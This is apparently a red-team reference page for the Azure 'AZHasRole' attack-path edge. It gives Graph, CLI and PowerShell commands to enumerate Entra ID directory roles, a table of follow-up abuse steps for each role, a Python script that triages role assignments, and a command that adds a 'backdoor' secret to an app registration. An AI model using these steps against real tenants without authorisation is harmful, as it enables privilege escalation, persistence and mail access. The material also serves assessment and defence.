AZHasRole

The source principal has been assigned a specific Entra ID directory role. This edge only records that the assignment exists; what can be done with it depends entirely on which role is held (and on its scope: a role assigned at an administrative unit is far weaker than a tenant-wide one).

Applies to: User / ServicePrincipal → AZRole (Entra ID directory roles)


Linux Abuse

Enumerate held roles for a principal

az login --service-principal -u <app-id> -p '<secret>' --tenant <tenant-id>
# az ad user has no subcommand that lists directory roles (get-member-groups returns groups only),
# so query Graph directly with the CLI's own token
az rest --method get \
  --url "https://graph.microsoft.com/v1.0/users/<target-user-id>/memberOf/microsoft.graph.directoryRole" \
  --query "value[].{displayName:displayName, roleTemplateId:roleTemplateId}" -o table

# Via Graph API (client credentials; the app needs an application permission such as
# Directory.Read.All or RoleManagement.Read.Directory for these calls)
TOKEN=$(curl -s -X POST \
  "https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
  -d "client_id=<app-id>&client_secret=<secret>&scope=https://graph.microsoft.com/.default&grant_type=client_credentials" \
  | jq -r '.access_token')

# memberOf returns only ACTIVE, directly assigned roles. Roles inherited through a
# role-assignable group only appear under .../transitiveMemberOf/microsoft.graph.directoryRole,
# and PIM-eligible roles do not appear here at all (see Opsec).
curl -s "https://graph.microsoft.com/v1.0/users/<target-user-id>/memberOf/microsoft.graph.directoryRole" \
  -H "Authorization: Bearer $TOKEN" | jq '.value[] | {displayName, roleTemplateId}'

# For service principals
curl -s "https://graph.microsoft.com/v1.0/servicePrincipals/<object-id>/memberOf/microsoft.graph.directoryRole" \
  -H "Authorization: Bearer $TOKEN" | jq '.value[] | {displayName, roleTemplateId}'

Get all active role assignments in tenant

# Results are paged: follow @odata.nextLink until it is absent. directoryScopeId shows whether
# the assignment is tenant-wide ("/") or limited to an administrative unit. Add
# $filter=principalId eq '<object-id>' to scope the query to a single principal.
curl -s "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments?\$expand=principal,roleDefinition" \
  -H "Authorization: Bearer $TOKEN" | jq '.value[] | {principalDisplayName: .principal.displayName, principalType: .principal."@odata.type", role: .roleDefinition.displayName, scope: .directoryScopeId}'

Windows Abuse

Microsoft.Graph PowerShell: enumerate roles

# Microsoft.Graph SDK v2 expects -AccessToken as a SecureString
Connect-MgGraph -AccessToken (ConvertTo-SecureString '<access-token>' -AsPlainText -Force)

# User roles. The cmdlet returns generic directory objects, so @odata.type and displayName
# live in AdditionalProperties; -All follows paging.
Get-MgUserMemberOf -UserId <target-user-id> -All |
  Where-Object { $_.AdditionalProperties.'@odata.type' -eq '#microsoft.graph.directoryRole' } |
  Select-Object @{n='DisplayName';e={$_.AdditionalProperties.displayName}}, Id

# SP roles
Get-MgServicePrincipalMemberOf -ServicePrincipalId <object-id> -All |
  Where-Object { $_.AdditionalProperties.'@odata.type' -eq '#microsoft.graph.directoryRole' } |
  Select-Object @{n='DisplayName';e={$_.AdditionalProperties.displayName}}, Id

# All role assignments. Principal is again a generic directory object; RoleDefinition is typed.
Get-MgRoleManagementDirectoryRoleAssignment -All -ExpandProperty "principal,roleDefinition" |
  Select-Object @{n='Principal';e={$_.Principal.AdditionalProperties.displayName}},
                @{n='Role';e={$_.RoleDefinition.DisplayName}},
                DirectoryScopeId

Follow-up abuse based on role held

Role Held                        Next Step
Global Administrator             See AZGlobalAdmin
Privileged Role Administrator    See AZPrivilegedRoleAdmin
User Access Administrator        See AZUserAccessAdmin
Application Administrator        Add secrets to any app registration or service principal
Cloud Application Administrator  Same as Application Administrator, minus Application Proxy management
Password Administrator           Reset passwords of non-admin users (and other Password Administrators)
Groups Administrator             Add/remove members of any group except role-assignable groups
Exchange Administrator           Grant yourself mailbox permissions (e.g. FullAccess), then read mail via EWS/Graph
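Triaging a full roleAssignments dump against the table above, as an added example that is not part of the original page: NEXT_STEP_BY_TEMPLATE, triage_role_assignments and the constructed SAMPLE_ROLE_ASSIGNMENTS are names introduced here (the sample IDs and display names are made up). The role template IDs are Microsoft's published values for the built-in roles and are identical in every tenant, unlike role object IDs; the JSON shape is what `$expand=principal,roleDefinition` returns. The function also surfaces two things the raw listing hides: assignments scoped to an administrative unit rather than the whole tenant, and assignments held by a group, whose members hold the role transitively.

```python
import json

# Template IDs of the built-in Entra ID directory roles from the table above.
# Template IDs are the same in every tenant; the role's object ID is not.
NEXT_STEP_BY_TEMPLATE = {
    "62e90394-69f5-4237-9190-012177145e10": ("Global Administrator", "See AZGlobalAdmin"),
    "e8611ab8-c189-46e8-94e1-60213ab1f814": ("Privileged Role Administrator", "See AZPrivilegedRoleAdmin"),
    "9b895d92-2cd3-44c7-9d02-a6ac2d5ea5c3": ("Application Administrator", "Add secrets to any app registration / service principal"),
    "158c047a-c907-4556-b7ef-446551a6b5f7": ("Cloud Application Administrator", "Add secrets to app registrations / service principals"),
    "966707d0-3269-4727-9be2-8c3a10f19b9d": ("Password Administrator", "Reset non-admin user passwords"),
    "fdd7a751-b60b-444a-984c-02652fe8fa1c": ("Groups Administrator", "Add/remove members of non-role-assignable groups"),
    "29232cdf-9323-42fd-ade2-1d097af3e4de": ("Exchange Administrator", "Grant mailbox permissions, then read mail"),
}


def triage_role_assignments(graph_json: str) -> list:
    """Map each active role assignment to the follow-up abuse path.

    graph_json is one page of
    GET /roleManagement/directory/roleAssignments?$expand=principal,roleDefinition
    (the caller follows @odata.nextLink for further pages).
    """
    findings = []
    for ra in json.loads(graph_json).get("value", []):
        role_def = ra.get("roleDefinition") or {}
        principal = ra.get("principal") or {}
        entry = NEXT_STEP_BY_TEMPLATE.get(role_def.get("templateId"))
        if entry is None:
            continue  # a role the table has no follow-up for (e.g. Directory Readers)
        role_name, next_step = entry
        # "#microsoft.graph.user" -> "user", "#microsoft.graph.group" -> "group", ...
        principal_type = principal.get("@odata.type", "").rsplit(".", 1)[-1]
        scope = ra.get("directoryScopeId", "/")
        findings.append({
            "principal": principal.get("displayName"),
            "principalType": principal_type,
            "role": role_name,
            "nextStep": next_step,
            # "/" is the whole tenant; anything else (e.g. /administrativeUnits/<id>)
            # confines the role to that administrative unit and weakens the abuse path
            "tenantWide": scope == "/",
            "scope": scope,
            # a group principal means every transitive member holds the role; a per-user
            # memberOf query will not show it, transitiveMemberOf will
            "viaGroup": principal_type == "group",
        })
    return findings


# Constructed sample in the shape Graph returns; IDs and display names are made up.
SAMPLE_ROLE_ASSIGNMENTS = json.dumps({
    "value": [
        {"id": "ra-1", "directoryScopeId": "/",
         "principal": {"@odata.type": "#microsoft.graph.user", "displayName": "alice"},
         "roleDefinition": {"displayName": "Global Administrator",
                            "templateId": "62e90394-69f5-4237-9190-012177145e10"}},
        {"id": "ra-2", "directoryScopeId": "/",
         "principal": {"@odata.type": "#microsoft.graph.servicePrincipal", "displayName": "ci-deployer"},
         "roleDefinition": {"displayName": "Application Administrator",
                            "templateId": "9b895d92-2cd3-44c7-9d02-a6ac2d5ea5c3"}},
        {"id": "ra-3", "directoryScopeId": "/",
         "principal": {"@odata.type": "#microsoft.graph.group", "displayName": "IT-Helpdesk"},
         "roleDefinition": {"displayName": "Groups Administrator",
                            "templateId": "fdd7a751-b60b-444a-984c-02652fe8fa1c"}},
        {"id": "ra-4", "directoryScopeId": "/administrativeUnits/11111111-2222-3333-4444-555555555555",
         "principal": {"@odata.type": "#microsoft.graph.user", "displayName": "bob"},
         "roleDefinition": {"displayName": "Password Administrator",
                            "templateId": "966707d0-3269-4727-9be2-8c3a10f19b9d"}},
        {"id": "ra-5", "directoryScopeId": "/",
         "principal": {"@odata.type": "#microsoft.graph.user", "displayName": "carol"},
         "roleDefinition": {"displayName": "Directory Readers",
                            "templateId": "88d8e3e3-8f55-4a1e-953a-9b9898b8876b"}},
    ]
})


if __name__ == "__main__":
    for f in triage_role_assignments(SAMPLE_ROLE_ASSIGNMENTS):
        where = "tenant-wide" if f["tenantWide"] else f["scope"]
        via = " (via group: enumerate transitive members)" if f["viaGroup"] else ""
        print(f'{f["principal"]} [{f["principalType"]}] {f["role"]} @ {where}{via} -> {f["nextStep"]}')
```

Feed it the JSON saved from the curl call in the previous section (one page at a time); anything it reports as scoped to an administrative unit or held via a group should be re-checked before assuming the full abuse path in the table applies.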

Application Administrator: add secret to any app

Connect-MgGraph -AccessToken (ConvertTo-SecureString '<access-token>' -AsPlainText -Force)
# -ApplicationId is the app registration's OBJECT id, not its appId (client id).
# The returned object's SecretText is shown once; capture it here or the secret is lost.
Add-MgApplicationPassword -ApplicationId <object-id> -PasswordCredential @{DisplayName="backdoor"}

Opsec

  • The AZHasRole edge itself requires no action; it documents existing access. Enumerating it is read-only, although every Graph call is still made with a token whose issuance is logged in sign-in logs.
  • Abuse actions taken using the role's privileges generate their own audit events (e.g. "Update application – Certificates and secrets management" for the Application Administrator path).
  • PIM-eligible roles (AZRoleEligible) must be activated before abuse, and activation is logged. memberOf lists only active assignments; eligibility lives under roleManagement/directory/roleEligibilitySchedules.
  • Passing a client secret on the command line (az login -p, curl -d) leaves it in shell history and process listings.